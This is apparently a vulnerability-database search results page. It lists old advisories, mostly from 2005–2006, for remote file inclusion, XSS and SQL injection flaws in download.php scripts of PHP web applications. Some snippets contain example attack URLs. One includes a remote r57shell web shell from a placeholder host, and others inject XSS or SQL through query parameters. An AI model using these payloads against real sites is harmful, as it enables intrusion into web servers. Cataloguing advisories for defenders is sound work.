Lucene search
K

422 matches found

seebug.org
seebug.org
added 2006/07/08 12:0 a.m.15 views

com_forum Mambo Component <= 1.2.4RC3 Remote Include Vulnerability

No description provided by source. Bug Found by h4ntu http://h4ntu.com batamhacker crew Another Mambo component remote inclusion vulneribility download : http://mamboxchange.com/frs/download.php/6873/phpbbcomponent1.2.4RC3.zip bug found in file : download.php define'INPHPBB', true; //$phpbbrootpa...

7.1AI score
Exploits0
0day.today
0day.today
added 2006/07/08 12:0 a.m.51 views

com_forum Mambo Component <= 1.2.4RC3 Remote Include Vulnerability

Exploit for unknown platform in category web applications ================================================================== comforum Mambo Component = 1.2.4RC3 Remote Include Vulnerability ================================================================== Bug Found by h4ntu http://h4ntu.com...

7.1AI score
Exploits0
Exploit DB
Exploit DB
added 2006/07/08 12:0 a.m.49 views

Mambo Component com_forum 1.2.4RC3 - Remote File Inclusion

Bug Found by h4ntu http://h4ntu.com batamhacker crew Another Mambo component remote inclusion vulneribility download : http://mamboxchange.com/frs/download.php/6873/phpbbcomponent1.2.4RC3.zip bug found in file : download.php define'INPHPBB', true; //$phpbbrootpath = './'; include$phpbbrootpath...

7.4AI score
Exploits0
securityvulns
securityvulns
added 2006/06/07 12:0 a.m.41 views

Multiple file include exploits in Xtreme Downloads v.1.0

Multiple file include exploits in Xtreme Downloads v.1.0 script type : Xtreme Downloads v.1.0 bug found by : sweet-devil & black-code team : site-down type : file include exploits : download.php http://www.example.com/path/download.php?root=http://yoursite/r57shell.txt? manager.php...

0.2AI score
Exploits0
Packet Storm
Packet Storm
added 2006/04/01 12:0 a.m.26 views

arabportalXSS.txt

ArabPortal 2.0 Stable .. The Best Arbian Portal & Forums System The Bug Is XSS code online.php?&title=D3vil-0x1CODE download.php?action=byuser&userid=1&title=D3vil-0x1CODE /code center ^^ Secumod 0.1 Anti-XSS & SQL Injection ^^ Get It For Free !! Only 15$ And Update it forever Connect Me By E-Mai...

7.4AI score
Exploits0
Prion
Prion
added 2006/03/30 1:6 a.m.20 views

Cross site scripting

Multiple cross-site scripting XSS vulnerabilities in Arab Portal 2.0 aka Arab Dynamic Portal or ADP stable allow remote attackers to inject arbitrary web script or HTML via the title parameter in 1 online.php and 2 download.php...

5.1CVSS6.1AI score0.06412EPSS
Exploits1References8Affected Software1
CVE
CVE
added 2006/03/30 1:0 a.m.40 views

CVE-2006-1504

CVE-2006-1504 concerns multiple XSS vulnerabilities in Arab Portal 2.0 (also called Arab Dynamic Portal/ADP). The issues allow remote attackers to inject arbitrary web script or HTML by manipulating the title parameter in two pages: online.php and download.php. The affected software is Arab Porta...

5.1CVSS5.8AI score0.06412EPSS
Exploits1References8Affected Software1
securityvulns
securityvulns
added 2006/03/29 12:0 a.m.30 views

ArabPortal 2.0 Stable CrossSiteScripting

ArabPortal 2.0 Stable .. The Best Arbian Portal & Forums System The Bug Is XSS code online.php?&title=D3vil-0x1/titleXSSCODE/XSS download.php?action=byuser&userid=1&title=D3vil-0x1/titleXSSCODE/XSS /code center ^^ Secumod 0.1 Anti-XSS & SQL Injection ^^ Get It For Free !! Only 15$ And Update it...

2AI score
Exploits0
securityvulns
securityvulns
added 2006/03/19 12:0 a.m.29 views

SQL-injection and XSS in photokorn gallery

Advisory: SQL-injection and XSS in photokorn gallery Home Page: http://www.telekorn.com Уязвимость/Vulnerability: SQL-injection Уязвимый скрипт/Vulnerable script: search.php http://www.stockvault.net/gallery/search.php?action=search&type=detail&where=keywords'&keyword=dotted Раскрытие установочно...

6.2AI score
Exploits0
Exploit DB
Exploit DB
added 2005/11/28 12:0 a.m.22 views

Bedeng PSP 1.1 - &#039;download.php?a.ngroup&#039; SQL Injection

source: https://www.securityfocus.com/bid/15583/info Bedeng PSP is prone to SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. Successful exploitation could result in a compromise of the...

7.4AI score
Exploits0
NVD
NVD
added 2005/11/18 11:3 p.m.10 views

CVE-2005-3676

SQL injection vulnerability in download.php in PhpWebThings 1.4.4 allows remote attackers to execute arbitrary SQL commands via the file parameter...

7.5CVSS8.4AI score0.01162EPSS
Exploits1References5
CVE
CVE
added 2005/11/18 11:0 p.m.38 views

CVE-2005-3676

The CVE-2005-3676 entry affects PhpWebThings 1.4.4, where a vulnerability in download.php allows SQL injection via the file parameter. This enables remote attackers to execute arbitrary SQL commands, with not-fully-specified impact details beyond the NVD summary. The connected documents confirm t...

7.5CVSS8.8AI score0.01162EPSS
Exploits1References5Affected Software1
Cvelist
Cvelist
added 2005/11/18 11:0 p.m.14 views

CVE-2005-3676

SQL injection vulnerability in download.php in PhpWebThings 1.4.4 allows remote attackers to execute arbitrary SQL commands via the file parameter...

8.4AI score0.01162EPSS
Exploits1References5
Packet Storm
Packet Storm
added 2005/11/15 12:0 a.m.22 views

phpWebThings144-2.txt

Vulnerable: phpWebThings 1.4.4 website : http://phpwebthings.org The bug in download.php ThE Exploit : http://www.target.com/download.php?file=|SQL ThE Error: You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near 'ord...

7.4AI score
Exploits0
securityvulns
securityvulns
added 2005/11/15 12:0 a.m.29 views

SQL injection in phpWebThing 1.4.4

Vulnerable: phpWebThings 1.4.4 website : http://phpwebthings.org The bug in download.php ThE Exploit : http://www.target.com/download.php?file=|SQL ThE Error: You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near 'ord...

0.2AI score
Exploits0
Tenable Nessus
Tenable Nessus
added 2005/11/14 12:0 a.m.13 views

phpWebThings download.php file Parameter SQL Injection

Binary data 3290.prm...

7.5CVSS7.3AI score0.02427EPSS
Exploits2References3
securityvulns
securityvulns
added 2005/09/26 12:0 a.m.22 views

Sql injection in jPortal version 2.3.1 &#40;module download&#41;

Versions: all from 2.2.1 to 2.3.1+Service Pack+shop jportalI check this bug only on one site SQL injection attack if magicquotesqpc=Off Problem is in file serching engine download.php, witch code is in “module/down.inc.php” file: code if$cat=='all' $q = "AND title LIKE '$word'"; else $q = "AND...

0.4AI score
Exploits0
Packet Storm
Packet Storm
added 2005/09/24 12:0 a.m.20 views

jPortalSQL.txt

Versions: all from 2.2.1 to 2.3.1+Service Pack+shop jportalI check this bug only on one site SQL injection attack if magicquotesqpc=Off Problem is in file serching engine download.php, witch code is in “module/down.inc.php” file: if$cat=='all' $q = "AND title LIKE '%$word%'"; else $q = "AND...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2005/08/21 12:0 a.m.17 views

jPORTAL 2.2.1/2.3.1 - &#039;download.php&#039; SQL Injection

source: https://www.securityfocus.com/bid/14926/info JPortal is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. Successful exploitation could result in a compromise of the...

7.4AI score
Exploits0
Cvelist
Cvelist
added 2005/08/17 4:0 a.m.19 views

CVE-2005-2607

PHP file include vulnerability in download.php in PHPSimplicity Simplicity oF Upload before 1.3.1 allows remote attackers to include arbitrary local and remote files via the language parameter and a terminating null "%00" characters...

6.7AI score0.01566EPSS
Exploits1References5
Rows per page
Query Builder